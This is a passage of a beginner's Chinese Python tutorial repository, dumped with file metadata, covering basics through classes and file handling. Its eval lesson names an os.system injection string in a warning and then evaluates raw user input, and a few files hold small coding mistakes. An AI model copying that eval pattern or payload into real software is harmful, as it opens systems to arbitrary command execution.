temp_total\n\n\n# TypeError: demo7() takes 1 positional argument but 4 were given\n# 函数的参数没有*,解释器会把调用处的参数当成多个个独立的参数,而不是一个元组参数\n# 需要给参数加上()\n# total = demo7(1, 2, 3, 4)\ntotal = demo7((1, 2, 3, 4))\nprint(total)\n" }, { "alpha_fraction": 0.4000000059604645, "alphanum_fraction": 0.5428571701049805, "avg_line_length": 14.55555534362793, "blob_id": "20e75aeef87bf759b51410730826c4b3379216a6", "content_id": "061e6fac986b324949f6516caabc897a7750d12b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 18, "num_lines": 9, "path": "/ibbie_02_运算符.py", "repo_name": 
"Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "print(1+1) # 加\nprint(20-10) # 减\nprint(10*10) # 乘\nprint(123/5) # 除\nprint(9 % 2) # 求余\nprint(2**3) # 幂\n\n# 乘号可以重复给定字符串\nprint(\"哈哈哈!!!\"*20)\n" }, { "alpha_fraction": 0.5197324156761169, "alphanum_fraction": 0.5565217137336731, "avg_line_length": 20.35714340209961, "blob_id": "676a1d41225530e68552c00571d79615e5324d38", "content_id": "57bcadb690c230900d80accddcb23244bad08874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1967, "license_type": "no_license", "max_line_length": 88, "num_lines": 70, "path": "/ibbie_20_公共方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n公共方法\n len() 计算容器元素个数\n del() 删除变量\n max() 返回容器中的最大值,如果是字典,只比较key\n min() 返回容器中的最小值,如果是字典,只比较key\n cmp() 比较大小,Python3.X已经取消,可用比较运算符进行比较,但比较运算符不能比较字典\n 切片 字符串、列表、元组都支持切片,字典不支持\n * 重复字符串、列表、元组的内容,不会修改原来的内容,字典不支持\n + 合并字符串、列表、元组的内容,不会修改原来的内容,字典不支持\n in & not in 判断是否包含,字典只判断key\n\n\n +与append()与extend()的区别\n + 不修改容器原来的内容\n append() 将参数中的内容作为一个元素放到容器中\n extend() 将参数的内容与原容器拼接\n\"\"\"\nt_list = [5, 8, 7, 6, 3]\nt_tuple = (\"a\", 256, 2.5, False, \"lalal\")\nt_dic = {\"key1\": 12,\n \"key2\": 200,\n \"key3\": 10.0}\nt_str = \"alkndglgahdlhgasdgasz\"\n\n\"\"\"del关键字 & del()\"\"\"\nprint(t_list)\ndel t_list[1]\nprint(t_list)\ndel(t_list[1])\nprint(t_list)\n\n\"\"\"len()\"\"\"\nll = len(t_list)\nlt = len(t_tuple)\nld = len(t_dic)\nls = len(t_str)\n\n\"\"\"max()\"\"\"\nml = max(t_list)\n# mt = max(t_tuple) # TypeError: '>' not supported between instances of 'int' and 'str'\nmd = max(t_dic)\nms = max(t_str)\n\n\"\"\"min()\"\"\"\nml = min(t_list)\n# mt = min(t_tuple) # TypeError: '>' not supported between instances of 'int' and 'str'\nmd = min(t_dic)\nms = min(t_str)\n\n\"\"\"切片\"\"\"\nt_list = [5, 8, 7, 6, 3]\nt_tuple = (\"a\", 256, 2.5, False, \"lalal\")\nprint(t_list[2:-1])\nprint(t_tuple[1:-1:2])\n\n\"\"\"重复\"\"\"\nprint(t_list * 2)\nprint(t_tuple * 
5)\n\n\"\"\"合并\"\"\"\nt_list2 = [1, 2]\nt_tuple2 = (\"haha\", 12.3, True)\nprint(t_list + t_list2)\nprint(t_tuple + t_tuple2)\n\n\"\"\"in & not in\"\"\"\nprint(1 in t_list)\nprint(256 not in t_tuple)\nprint(\"key1\" in t_dic)\n" }, { "alpha_fraction": 0.40758293867111206, "alphanum_fraction": 0.4265402853488922, "avg_line_length": 8.590909004211426, "blob_id": "7db883d7877dfa9c2bd34364d69626b7c66b4f84", "content_id": "20866e4f3f3a486fd0e373a6f126e45c8a3afd14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 305, "license_type": "no_license", "max_line_length": 23, "num_lines": 22, "path": "/ibbie_23_交换变量的值.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n交换两个变量的值\n\"\"\"\na = 10\nb = 20\n\n\"\"\"方法一,添加中间变量\"\"\"\n# c = a\n# a = b\n# b = c\n\n\"\"\"方法二,不增加中间变量\"\"\"\n# a = a + b\n# b = a - b\n# a = a - b\n\n\"\"\"方法三,利用元组,python特有\"\"\"\n# a, b = (b, a)\na, b = b, a # 可以省略小括号\n\nprint(a)\nprint(b)\n" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 13.733333587646484, "blob_id": "14baa4ec352e16aa1b153ef2d90327f65a774efc", "content_id": "7b85ba4e4c16e2ae66cc994cfe6834efafaa1427", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 61, "num_lines": 15, "path": "/ibbie_42_内置属性name.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n__name__\n 保存的是当前模块名\n 若在当前模块输出该属性,输出的是__main__\n 若在非当前模块输出该属性,输出的是模块名\n 可以使用该属性,在模块中加入判断后测试代码,不影响测试的同时,在其它模块使用该模块时,不会把模块的测试代码执行一遍\n\"\"\"\n\n\ndef main():\n print(\"一堆测试代码\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6041958332061768, "alphanum_fraction": 0.6069930195808411, "avg_line_length": 24.535715103149414, "blob_id": "d2155079d316261652fe1fee70be4cbf63ea8b19", "content_id": 
"0000d7514d1754535254306f40e72dfb6a01761f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 75, "num_lines": 28, "path": "/ibbie_28_私有属性和方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n私有属性和方法\n 在属性名或方法名前添加两条下划线,表示此属性或方法是私有的\n 只能在类的内部直接调用\n 在python中没有真正的私有属性或方法\n 在外部想要调用私有属性或方法,使用 _类名__属性名 或 _类名__方法名 的方式调用(不建议使用)\n\"\"\"\n\n\nclass Girl:\n def __init__(self, name):\n self.name = name\n self.__age = 18 # 私有属性\n\n def getname(self):\n self.__getage() # 类内部可以调用私有方法\n print(\"我叫%s今年%d岁\" % (self.name, self.__age)) # 类内部可以调用私有属性\n\n def __getage(self): # 私有方法\n print(\"我今年%d岁\" % self.__age)\n\n\nd = Girl(\"猪猪girl\")\n# d.__age # AttributeError: 'Girl' object has no attribute '__age'\nprint(d._Girl__age) # _类名__私有属性 可以在类外部调用私有属性\nd._Girl__getage() # _类名__私有方法 可以在类外部调用私有方法\n# d.__getage() # AttributeError: 'Girl' object has no attribute '__getage'\nd.getname()\n" }, { "alpha_fraction": 0.5744274854660034, "alphanum_fraction": 0.5744274854660034, "avg_line_length": 12.789473533630371, "blob_id": "f49f7ac509f360c850eb62203b48292ad97d72e8", "content_id": "accb6b4775a203ddcff8feb353047bcfe6ee8016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "no_license", "max_line_length": 40, "num_lines": 38, "path": "/ibbie_30_方法的重写.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n方法的重写\n 父类的方法不能满足子类的需求\n 在子类中定义与父类同名的方法,重写方法的实现即可\n\nsuper()\n 代表父类\n 可以通过super()调用父类的方法,super().方法名()\n 重写方法时,可以通过调用父类的方法,不完全覆盖父类的方法,实现方法的扩展\n\"\"\"\n\n\nclass Animal:\n\n def eat(self):\n print(\"吃东西\")\n\n def sleep(self):\n print(\"睡觉\")\n\n\nclass Dog(Animal):\n\n def bark(self):\n print(\"汪汪汪\")\n\n def sleep(self): # 重写父类的方法\n print(\"四脚朝天地睡\")\n\n def eat(self):\n super().eat() # 调用父类的eat方法\n print(\"吃的是骨头\")\n\n\ndog = 
Dog()\ndog.sleep() # 调用的是Dog重写的sleep方法\ndog.eat()\ndog.bark()\n" }, { "alpha_fraction": 0.61208575963974, "alphanum_fraction": 0.6140350699424744, "avg_line_length": 13.25, "blob_id": "809e723d95377897614b9087817ee35162b86944", "content_id": "def154bd26fa88d2361631bd1b4d0872443607ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 49, "num_lines": 36, "path": "/ibbie_39_类方法和静态方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n类方法\n @classmethod\n def 类方法名(cls):\n pass\n\n cls表示当前类\n @classmethod表示这是一个类方法\n 类方法的第一个参数必须是cls\n cls.类属性 调用类属性\n\n静态方法\n @staticmethod\n def 静态方法名():\n print(\"我是静态方法\")\n\n @staticmethod表示这是一个静态方法\n 可以将 不需要访问实例属性和类属性 以及 不需要调用实例方法和类方法 的方法定义成静态方法\n 类名.静态方法() 调用静态方法\n\"\"\"\n\n\nclass Tool:\n count = 0\n\n @classmethod\n def get_tool_count(cls):\n print(cls.count)\n\n @staticmethod\n def test_methon():\n print(\"我是静态方法\")\n\n\nTool.get_tool_count()\nTool.test_methon()\n" }, { "alpha_fraction": 0.4156171381473541, "alphanum_fraction": 0.44458436965942383, "avg_line_length": 14.880000114440918, "blob_id": "cf4aa5c3f8f7a35747b0c2fc5b7f763d029e7920", "content_id": "05c9103bf8dd6e5df8a19ca430462e99f57e1320", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1132, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/ibbie_10_循环语句.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n程序三大流程\n 顺序--从上向下,顺序执行\n 分支--根据条件判断,决定执行代码的分支\n 循环--让特定代码重复执行\n\nwhile循环 当满足条件就继续\n\"\"\"\n\ni = 1 # 计数器初始化\nwhile i <= 10:\n print(\"hello\")\n i = i + 1 # 不要忘记计数器,否则会造成死循环\nprint(\"循环结束后,i=%d\" % i) # i=11\n\n# 嵌套循环\nm = 1\nwhile m <= 10:\n n = 1\n star = \"\"\n while n <= m:\n star = star + \"*\"\n n = n + 1\n\n print(star)\n m = m + 1\n\nprint(\"----我是一条分隔符----\")\n\n# 
不换行输出:pring(\"输出的内容\",end=\"\"),默认end是换行符,显式指定end可以改变结尾的符号\nj = 10\nwhile j >= 1:\n k = j\n while k >= 1:\n print(\"⭐\", end=\"♥\") # end=\"\"表示结尾不加任何东西,也可以指定其它符号\n k = k - 1\n print(\"\")\n j = j - 1\n\nprint(\"----我是一条分隔符----\")\n\n# 九九乘法表\na = 1\nwhile a <= 9:\n b = 1\n while b <= a:\n print(\"%d * %d = %d\" % (a, b, a * b), end=\"\\t\") # 使用了制表符“\\t”\n b = b + 1\n print(\"\")\n a = a + 1\n" }, { "alpha_fraction": 0.559624433517456, "alphanum_fraction": 0.6704225540161133, "avg_line_length": 16.177419662475586, "blob_id": "c2776ec06eec4be9a888fa72b8cd7e41282eb42c", "content_id": "51fe8e4609a89c4bf1d664d1338c04e20452314d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1861, "license_type": "no_license", "max_line_length": 59, "num_lines": 62, "path": "/ibbie_22_变量.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n变量\n 赋值操作传递的是引用,修改的是引用\n 方法修改的是引用指向的值,而不是修改引用\n id() 查看变量的内存地址\n\n不可变类型:\n 数值,元组,字符串\n hash() 提取不可变数据的特征码,返回的是一个整数,相同的内容会得到相同的整数,不同的内容会得到不同的整数\n 字典的key只能使用不可变的数据类型,python会对key进行hash以决定如何在内存中保存字典的数据\n可变类型:列表,字典\n\n局部变量:\n 函数内部定义的变量,只能在函数内部使用\n 生命周期:函数执行时创建,函数结束后回收\n全局变量:\n 在函数外部定义的变量,所有函数都可以使用这个变量\n 在python中,函数不能直接修改全局变量的值\n 想要在函数内部修改全局变量,要使用global关键字,显式声明要修改的是全局变量\n 建议:模块中的全局变量定义在所有函数定义的上方,确保每个函数都能正常访问全局变量的值\n 命名要求:增加“gl_”或\"g_\"前缀\n\n一般的代码结构:从上到下,shebang==>import模块==>全局变量==>函数定义==>执行代码\n\"\"\"\n\n# a = 1\n# print(id(a)) # 2232464140592\n#\n# b = a\n# print(id(b)) # 2232464140592\n# print(id(1)) # 2232464140592\n#\n# a = 2\n# print(id(a)) # 2232464140624\n# print(id(b)) # 2232464140592\n\ntemp_list = [1, 2, 3]\nprint(id(temp_list)) # 1540399587840\ntemp_list.insert(3, 66)\nprint(id(temp_list)) # 1540399587840\n\n# 全局变量\nnum = 10\n\n\ndef demo():\n # 局部变量\n num = 99 # 函数内部,不会修改同名的全局变量\n print(num)\n\n\ndef demo2():\n # 使用global关键字声明num是全局变量\n global num\n num = 666\n\n\nprint(num) # 10\ndemo() # 99\nprint(num) # 10\ndemo2()\nprint(num) # 666\n" }, { 
"alpha_fraction": 0.7862595319747925, "alphanum_fraction": 0.8015267252922058, "avg_line_length": 17.85714340209961, "blob_id": "263c8d1741b10d79570b5472305761003c00d1b4", "content_id": "ddd758f59475fe173dd19aae5af88d382d730a1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 34, "num_lines": 7, "path": "/ibbie_35_新式类和旧式类.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n新式类:以Object为基类的类(推荐使用)\n旧式类(经典类):不以Object为基类的类(不推荐使用)\n\npython2.x中,定义类时若不指定父类,不会以Object为基类\npython3.x中,定义类时若不指定父类,默认以Object为基类\n\"\"\"" }, { "alpha_fraction": 0.5591586232185364, "alphanum_fraction": 0.590709924697876, "avg_line_length": 19.375, "blob_id": "116bc08b5b876df5a3755c4c2b4a3a25ee96613a", "content_id": "c38a33a3499b951d11d67111d4d9809b8e3782a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1551, "license_type": "no_license", "max_line_length": 74, "num_lines": 56, "path": "/ibbie_18_字典.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n字典(dictionary)\n 使用键值对存储数据,通常用于存储描述一个物体的相关信息\n 字典是一个无序的数字集合\n 字典名 = {键:值,键:值,键:值,键:值}\n 键是唯一的,只使用字符串、数字或元组\n 值可以是任何类型,一个键对应只有一个值\n\"\"\"\n\n\"\"\"定义字典\"\"\"\nibbie_dic = {\"name\": \"ibbie\",\n \"age\": 1,\n \"height\": 2.00,\n \"hobby\": \"敲代码\"}\nprint(ibbie_dic)\n\n\"\"\"从字典中取值\"\"\"\nprint(ibbie_dic[\"name\"])\n# ibbie_dic[\"gender\"] # 若key不存在,报错:KeyError\n\n\"\"\"根据key修改value,若key不存在,会在字典中添加新的键值对\"\"\"\nibbie_dic[\"age\"] = 2 # key存在,修改key对应的value\nprint(ibbie_dic)\n\nibbie_dic[\"weight\"] = 90.0 # key不存在,新增键值对\nprint(ibbie_dic)\n\n\"\"\"删除键值对\"\"\"\nibbie_dic.pop(\"age\")\nprint(ibbie_dic)\n# ibbie_dic.pop(\"abc\") # KeyError\n\n\"\"\"字典中键值对的数量\"\"\"\nprint(len(ibbie_dic))\n\n\"\"\"合并字典\"\"\"\ntemp_dic = {\"phone\": \"13100000000\",\n \"gender\": 
False}\nibbie_dic.update(temp_dic)\nprint(ibbie_dic)\n\ntemp2_dic = {\"phone\": \"13188888888\"}\nibbie_dic.update(temp2_dic) # 如果合并的字典中有相同的key,会替换掉被updated的字典中相同key的value\nprint(ibbie_dic)\n\n\"\"\"清空字典\"\"\"\nibbie_dic.clear()\nprint(ibbie_dic)\n\n\"\"\"遍历字典\"\"\"\nibbie_dic = {\"name\": \"ibbie\",\n \"age\": 1,\n \"height\": 2.00,\n \"hobby\": \"敲代码\"}\nfor k in ibbie_dic:\n print(\"%s : %s\" % (k, ibbie_dic[k]))\n" }, { "alpha_fraction": 0.4600326120853424, "alphanum_fraction": 0.47634583711624146, "avg_line_length": 17.02941131591797, "blob_id": "1a4d2067ff45a51f73a8c92b0bb93854a220fdc9", "content_id": "155b684af3cf77cf8dc5bcd2006b10a7acf52f0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 797, "license_type": "no_license", "max_line_length": 50, "num_lines": 34, "path": "/ibbie_21_for循环.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\nfor循环\n\n for temp in 容器:\n 某些操作\n else:\n 某些操作\n\n执行完循环体后,才会执行else的内容,如果循环中途使用break退出循环,则不会执行else的内容\n一般情况下不会加上else,常用于搜索操作,若搜索不到则执行else的内容\n\"\"\"\nt_list = [1, 2, 3]\nfor num in t_list:\n print(num)\n if num == 2:\n break\nelse:\n print(\"结束\")\n\nstudent_list = [{\"name\": \"小明\",\n \"age\": 20},\n {\"name\": \"小红\",\n \"age\": 21},\n {\"name\": \"小白\",\n \"age\": 22}]\n\nstu = \"ibbie\"\nfor stu_dic in student_list:\n if stu_dic[\"name\"]==stu:\n print(stu_dic)\n print(\"找到\"+stu+\"了\")\n break\nelse:\n print(\"找不到\"+stu)\n" }, { "alpha_fraction": 0.5711678862571716, "alphanum_fraction": 0.5894160866737366, "avg_line_length": 16.125, "blob_id": "fdeeac593cd779b12f11683f9b232f672b680f9c", "content_id": "ff111d1caf7ff00670d88aadfa987b15a1bed36b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 59, "num_lines": 64, "path": "/ibbie_27_init和del和str方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", 
"text": "\"\"\"\n__init__()\n 创建类的对象时,为对象分配完内存后,会自动执行初始化方法\n 可以在初始化方法中使用 self.变量=初始值 添加属性\n 如果不想写死属性的值,可以为init方法添加参数,把传递进来的参数赋给属性,创建对象时,要传递对应的参数\n\n__del__()\n 当对象被销毁前,会调用del方法\n 可以在del中\n\n__str__()\n 使用print打印对象时会调用的方法\n 默认是打印对象的内存地址\n 可以自定义打印对象输出的内容,str方法必须返回一个字符串\n\"\"\"\n\n\nclass Demo1:\n\n def __init__(self, name):\n print(\"我是init,创建对象时会被调用\")\n self.a = True\n self.b = 123\n self.name = name\n\n def __del__(self):\n print(\"我是del,Demo1对象临死前调用\")\n\n def __str__(self):\n return \"我是%s\" % self.name\n\n\nd2 = Demo1(\"蠢猪\")\nprint(d2.a)\nprint(d2.b)\nprint(d2.name)\nprint(d2)\n\n\nclass Person:\n def __init__(self,name,weight):\n self.name = name\n self.weight = weight\n\n def __del__(self):\n print(\"%s最后的体重是:%.2fkg\" % (self.name, self.weight))\n\n def __str__(self):\n return \"%s现在的体重是:%.2fkg\" % (self.name, self.weight)\n\n def eat(self):\n self.weight += 1\n\n def run(self):\n self.weight -= 0.5\n\n\nxiaoming = Person(\"小明\", 75.00)\nxiaoming.run()\nprint(xiaoming)\nxiaoming.eat()\nxiaoming.run()\nxiaoming.run()\nprint(xiaoming)\n" }, { "alpha_fraction": 0.5657015442848206, "alphanum_fraction": 0.5723830461502075, "avg_line_length": 18.478260040283203, "blob_id": "5ac81e44bb704a121eb5d80f3a06a6f4819758ba", "content_id": "1a2da9dc1c1432eccb825ea001651fe097a206c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 98, "num_lines": 23, "path": "/ibbie_31_父类的私有属性和方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n父类的私有属性和方法\n 虽然子类拥有父类的所有属性和方法,但是子类不能直接调用父类的私有属性和方法\n\"\"\"\n\n\nclass A:\n def __int__(self):\n self.__a = 123 # 私有属性\n\n def __test(self): # 私有方法\n print(\"我是A的私有方法\")\n\n\nclass B(A):\n def demo(self):\n print(\"我是B的demo()\")\n # print(self.a) # 若调用demo方法,AttributeError: 'B' object has no attribute 'a'\n # super().__test() # 若调用demo方法,AttributeError: 'super' object has no attribute '_B__test'\n\n\nb 
= B()\nb.demo()\n\n" }, { "alpha_fraction": 0.6185661554336548, "alphanum_fraction": 0.6360294222831726, "avg_line_length": 20.760000228881836, "blob_id": "8d556ed4dafd506575935d2c131f3fd0dc8c36dd", "content_id": "a58d4a7f57c7220bca999925a39fc4c2d2179f4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 77, "num_lines": 50, "path": "/ibbie_17_元组.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n元组(tuple)\n 与列表类似,但是元组定义完成后,不能修改\n 用()定义\n 索引从0开始\n 通常存放不同类型的数据\n\n应用场景:\n 作为函数的参数或返回值,使得函数可以接收多个参数,或者返回多个返回值\n 格式化字符串\n 让列表不能被修改,保护数据安全\n\"\"\"\n\n\"\"\"元组的定义\"\"\"\nperson_tuple = (\"张三\", 20, 1.75)\n\nempty_tuple = () # 空元组\n\nsingle_tuple = (1) # 这不是一个元组\nprint(type(single_tuple)) # <class 'int'>\nsingle_tuple = (1,) # 只有一个元素的元组,元素后面要加上\",\"\nprint(type(single_tuple)) # <class 'tuple'>\n\n\"\"\"取值或取索引\"\"\"\nprint(person_tuple[0])\n# person_tuple[3] # IndexError: tuple index out of range\nprint(person_tuple.index(20))\n# print(person_tuple.index(21)) # ValueError: tuple.index(x): x not in tuple\n\n\"\"\"元组的长度\"\"\"\nprint(len(person_tuple))\n\n\"\"\"元组中指定内容的个数\"\"\"\nprint(person_tuple.count(1.75))\n\n\"\"\"遍历元组\"\"\"\nfor temp in person_tuple:\n print(\"%s : %s\" % (type(temp), temp))\n\n\"\"\"格式化字符串\"\"\"\nprint(\"%s 的年龄是 %d ,身高 %.2f m\" % person_tuple)\nperson_str = \"%s 的年龄是 %d ,身高 %.2f m\" % person_tuple\nprint(person_str)\n\n\"\"\"list和tuple之间的转换\"\"\"\nperson_list = list(person_tuple) # 元组==>列表\nprint(type(person_list)) # <class 'list'>\n\ntemp_tuple = tuple(person_list) # 列表==>元组\nprint(type(temp_tuple)) # <class 'tuple'>\n" }, { "alpha_fraction": 0.5515970587730408, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 14.339622497558594, "blob_id": "01cbad4e39f732d394e2c2e493c1e57ecd8a79ae", "content_id": "540503f2753eddcc6c61d999e95fd2534f59bfba", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 61, "num_lines": 53, "path": "/ibbie_26_面向对象.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n面向对象\n dir()可以查看python针对该对象提供的内置的方法或属性\n\n定义类的格式:\n class 类名:\n def 方法名1(self, 参数列表):\n pass\n def 方法名2(self, 参数列表):\n pass\n\n创建类的对象\n 变量名 = 类名()\n 不修改类,可以使用 变量名.属性 为对象增加属性(不推荐)\n\n关于类的定义:\n 使用class关键字\n 定义方法的第一个参数必须是self\n\n关于self\n 表示对象本身,可以使用self在类中调用属性或方法,包括使用 变量名.属性 增加的属性,也可以使用self调用\n\"\"\"\n\n\ndef demo():\n \"\"\"我是demo\"\"\"\n print(\"我是demo\")\n\n\nprint(dir(demo))\nprint(demo.__doc__)\nprint(dir(\"abc\"))\nprint(dir(2))\nprint(dir(True))\n\n\nclass DemoClass:\n \"\"\"定义一个类\"\"\"\n def method1(self, num):\n print(\"method1\")\n\n def method2(self, a, b, c):\n print(\"method2\")\n\n\n\"\"\"创建类的对象\"\"\"\nd = DemoClass()\nd.method1(1)\nd.method2(1, 2, 3)\nprint(d) # <__main__.DemoClass object at 0x00000219B4288FD0>\nprint(\"%x\" % id(d)) # 219b4288fd0\nd.name = \"hahah\"\nprint(d.name)\n\n" }, { "alpha_fraction": 0.7006369233131409, "alphanum_fraction": 0.7006369233131409, "avg_line_length": 16.44444465637207, "blob_id": "f7e6831bed21c74acf494b0e9fe1a1fb0b757d6f", "content_id": "f14793bdeb8bc4dc9bf7f94609ba24cb5abefda1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 73, "num_lines": 9, "path": "/ibbie_49_eval函数.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\neval函数\n 可以将传入的字符串当成有效的表达式进行计算\n\n注意:不要让eval直接接收input的内容,否则用户可以利用__import__('os').system('xxx命令')的方式,执行终端命令\n\"\"\"\n\nstr = input(\"请输入表达式:\")\nprint(eval(str))\n" }, { "alpha_fraction": 0.7007299065589905, "alphanum_fraction": 0.7007299065589905, "avg_line_length": 14.333333015441895, "blob_id": "21688a73237a29fd30487e9572c6566577df56f5", "content_id": "4be8ce7af2ea3919620bc05a6f86da8a23e4296f", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/ibbie_43_package/__init__.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\npackage\n 多个相关联的模块可以放进一个package中\n 每个python包下都有一个特殊的文件__init__.py\n __init__.py文件中指定该包要对外提供的模块\n\"\"\"\n\n\nfrom . import test_package" }, { "alpha_fraction": 0.5669934749603271, "alphanum_fraction": 0.5669934749603271, "avg_line_length": 12.30434799194336, "blob_id": "7022242d30b0180063d88c31e11e6415d7279a38", "content_id": "2dc130e02c1682365904bdd977806437a734ba6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 800, "license_type": "no_license", "max_line_length": 32, "num_lines": 46, "path": "/ibbie_29_继承.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n继承\n 子类继承父类所有的方法和属性\n 继承的格式:\n class 类名(父类名):\n pass\n\n 可以多重继承,C继承B,B继承A,C也具有A的属性和方法\n\"\"\"\n\n\nclass Animal:\n\n def eat(self):\n print(\"吃东西\")\n\n def sleep(self):\n print(\"睡觉\")\n\n\nclass Dog(Animal):\n\n def bark(self):\n print(\"汪汪汪\")\n\n\nclass Cat(Animal):\n def catch(self):\n print(\"抓老鼠\")\n\n\nclass HelloKitty(Cat):\n def cute(self):\n print(\"可可爱爱\")\n\n\ndog = Dog()\ndog.eat() # Animal类的方法\ndog.sleep() # Animal类的方法\ndog.bark() # Dog自己的方法\n\nhk = HelloKitty()\nhk.eat() # Animal类的方法\nhk.cute() # Animal类的方法\nhk.catch() # Cat类的方法\nhk.sleep() # HelloKitty自己的方法\n" }, { "alpha_fraction": 0.6066482067108154, "alphanum_fraction": 0.6121883392333984, "avg_line_length": 10.645161628723145, "blob_id": "f8750bd90cb189447c35494a684b485c5f74484c", "content_id": "fc083141a5bc1c8d88ded0157eb5c79d426e835b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 623, "license_type": "no_license", "max_line_length": 38, "num_lines": 31, "path": "/ibbie_01_注释.py", 
"repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# 我是注释,建议“#”后面加一个空格\nprint(\"我是程序\")\n\nprint(\"啦啦啦\") # 在代码后注释,建议代码与“#”之间有两个空格\n\n\"\"\"\n多行注释\n多行注释\n多行注释\n\"\"\"\nprint(\"hhh\")\n\n\n# 快捷键shift+alt+F调整代码格式\n\n\n# 文档注释\ndef function(a, b):\n \"\"\"\n 此处是函数的文档注释\n 在调用处使用快捷键ctrl+Q可以查看函数的文档注释\n\n :param a:我是a参数的文档注释\n :param b:我是b参数的文档注释\n :return 我是返回值的文档注释\n \"\"\"\n print(\"执行函数function\")\n return a + b\n\n\nfunction(1, 1)\n" }, { "alpha_fraction": 0.6013104915618896, "alphanum_fraction": 0.616431474685669, "avg_line_length": 18.076923370361328, "blob_id": "3e3d115d78765595a1c1686ecab4138aebb79307", "content_id": "0ebe61316277a65ecb1b050e9193b1c58ca42371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2960, "license_type": "no_license", "max_line_length": 91, "num_lines": 104, "path": "/ibbie_47_文件操作.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n文件操作\n 打开 open(文件名,打开方式)\n 默认以只读形式打开文件\n f 只读,默认值\n w 只写,若文件存在,覆盖原文件,若文件不存在,自动创建\n a 追加\n r+ 读写,若文件不存在,抛出异常\n w+ 读写,若文件存在,覆盖原文件,若文件不存在,自动创建\n a+ 读写,若文件存在,在文件指针指向末尾追加,若不存在,自动创建\n 注意:频繁移动文件指针会影响文件读写效率,所以一般使用无+号的三个参数\n 读 read()\n 分行读 readline()\n 写 write()\n 关闭 close()\n\n文件指针\n 在使用open()打开文件后,文件指针指向文件开头\n 使用read()后,文件指针指向文件结尾,默认读取文件所有内容\n 再次调用read(),就没有任何数据可以获取了\n\nimport os 文件/文件夹操作的包\n \n\"\"\"\nimport os # 文件/文件夹操作的包\n\n\"\"\"打开文件\"\"\"\nfile = open(\"readme.txt\") # 会在当前目录下寻找\n\n\"\"\"读取文件\"\"\"\ntext = file.read()\nprint(text)\nprint(\"*\" * 34)\ntext2 = file.read()\nprint(text2) # 没有内容输出\n# file.write(\"try to write\") # 文件是以只读的形式打开的,不能进行写的操作:io.UnsupportedOperation: not 